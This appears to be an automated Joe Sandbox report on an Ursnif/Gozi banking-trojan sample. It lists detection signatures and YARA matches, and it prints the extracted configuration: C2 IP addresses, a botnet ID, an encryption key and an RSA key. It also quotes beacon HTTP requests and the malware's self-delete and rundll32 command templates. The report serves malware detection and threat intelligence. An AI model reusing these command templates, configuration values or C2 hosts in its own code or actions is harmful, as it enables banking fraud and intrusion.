Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:827054
MD5:768928d17e8d3489407b540dbad4a770
SHA1:8ce488487dc133ef92dec536608b0c1056a3e16a
SHA256:5d0be9aaad980137d68677d7ef3758d9ce7a4e2d170df0abee803f64b14dcd67
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 3536 cmdline: C:\Users\user\Desktop\server.exe MD5: 768928D17E8D3489407B540DBAD4A770)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x6b65:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ca0:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      Click to see the 27 entries
      No Sigma rule has matched
      Timestamp:192.168.2.45.44.43.1749695802033203 03/15/23-14:40:37.858863
      SID:2033203
      Source Port:49695
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: server.exeVirustotal: Detection: 55%Perma Link
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000003.303363656.0000000002C90000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCitKVnthsrIejolA7zuBWvwII2di/DH3GlyTtkQAl5+NYn11P8hoApgIAx8QgiEaRicK3ETZq3j2ua44XjJevEH0XzzTqZAT3wkYswDxrBkgZMCwo6YXkhXitvoh3eARDtRDEkQsoLHZ9GnSskgPPZhcXZcW5DEVGUxmtbXgDaTXEEASp94TxsSTq8LcHFcoUD/3qCUIKISKD7sIV0hgpJQ8kx5Fr/zREoX54YDyuxKi/xJ3SBIavWF9UPU+YwvxpBDYMFrMsKJrjGUlpoQZehisJjttb1cTtggelEGnFr5O2GXefQUuwrSizDeVnMRSAHdds+AiqlPxEl1nFzSfnHhHtw7Ql8JtPTws7Z1Ho=", "c2_domain": ["checklist.skype.com", "5.44.43.17", "31.41.44.108", "62.173.138.213", "109.248.11.174"], "botnet": "7714", "server": "50", "serpent_key": "lk8hY4nisKQzZKXE", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02CE1508

      Compliance

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Binary string: C:\nexonanil\dituvap\gekezatuz82\povosozuwozob16\saleni90 c.pdb source: server.exe

      Networking

      barindex
      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49695 -> 5.44.43.17:80
      Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
      Source: global trafficHTTP traffic detected: GET /drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B/g9_2Bh6q/18_2Bd4Y19mjSIvebXNvx4u/IKPQjubsH_/2BffqZNZA6lqyycQo/1wN43eb54EKC/UkUZJXRrn4j/R3115Fw4Czb8SK/xar7XimyyrkEE9m9c0UP0/1KSNpQlordpxo1Ws/_2B6QH8tLTSTNrP/6dO_2BuUeu5EmaGfZI/wcja66YPQ/Z_2B4nfOuMl7_2BnQaBq/8KUwwwam.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 5.44.43.17
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: unknownTCP traffic detected without corresponding DNS query: 31.41.44.108
      Source: server.exe, 00000000.00000002.568929049.00000000049BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://31.41.
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/32
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.44.108/drew/FJTU0wze8Hjvm_2BHka/T78K158O_2Fv5farATygbE/7uQJsjJeUPlO2/LBUhKSJa/o4FD53ecF
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/-A1ED-B2838757AE1B
      Source: server.exe, 00000000.00000002.568866270.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/98D0-4585-A1ED-B2838757AE1B
      Source: server.exe, 00000000.00000002.568866270.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.44.43.17/drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B
      Source: server.exe, 00000000.00000002.568866270.0000000002EAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/RCiQyn59/Gow2vU3BObfVI7A8uLXOgnm/720Rvxrh27/9sCisgCQ1dbhwi3H4/XmYN2I
      Source: unknownDNS traffic detected: queries for: checklist.skype.com
      Source: global trafficHTTP traffic detected: GET /drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B/g9_2Bh6q/18_2Bd4Y19mjSIvebXNvx4u/IKPQjubsH_/2BffqZNZA6lqyycQo/1wN43eb54EKC/UkUZJXRrn4j/R3115Fw4Czb8SK/xar7XimyyrkEE9m9c0UP0/1KSNpQlordpxo1Ws/_2B6QH8tLTSTNrP/6dO_2BuUeu5EmaGfZI/wcja66YPQ/Z_2B4nfOuMl7_2BnQaBq/8KUwwwam.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 5.44.43.17Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTR
      Source: server.exe, 00000000.00000002.568840095.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02CE1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02CE1508

      System Summary

      barindex
      Source: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.568790164.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.568790164.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
